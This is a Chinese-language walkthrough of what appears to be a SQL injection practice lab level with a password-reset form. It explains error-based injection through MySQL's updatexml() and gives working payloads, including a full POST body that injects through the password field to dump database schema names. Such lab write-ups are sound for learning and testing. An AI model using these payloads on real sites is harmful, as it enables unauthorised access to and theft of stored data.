这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框
首先阅读源码发现
该题先审查user name的值，只有当user name的值是真值的时候才会处理下一步的new password
重点引入了update函数

$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

这个函数的作用就是更新数据库

updatexml()函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string是文档中的路径，且要符合xpath语法
第三个参数：new_value，String格式，替换查找到的符合条件的数据
作用：改变文档中符合条件的节点的值
报错注入原理：当应该输入路径的地方没有遵循xpath语法就会报错，如果网站会将数据库的报错返回到网页上，那我们就可以基于这一点爆取信息，这就是报错注入。

首先测试注入点
在user name测试了常见的7种变量的包裹方法均报错，说明对此处输入的信息做了过滤
在new password处测试发现变量的包裹方式为 单引号
开始构造payload
先尝试使用update函数

select updatexml(1, concat(0x7e,(database())),1);

使用该语句在数据库中查询可得结果如下图，说明这种注入思路可行
其中的concat()函数是将其连成一个字符串，因此不会符合XPATH_string的格式，从而出现格式错误，爆出我们真正要查询的数据

而我们的注入语句为：

 select updatexml(1,concat(0x7e,(SELECT username from security.users limit 0,1),0x7e),1);

拼接可得

uname=admin&passwd=admin' and updatexml('forming is very handsome',concat(',',(select schema_name from information_schema.schemata limit 0,1),','),'forming is very handsome') #&submit=Submit

然后后面正常拼接sql注入的查询语句，一步一步的顺着查询表名，字段名，以及我们要查的数据
就行了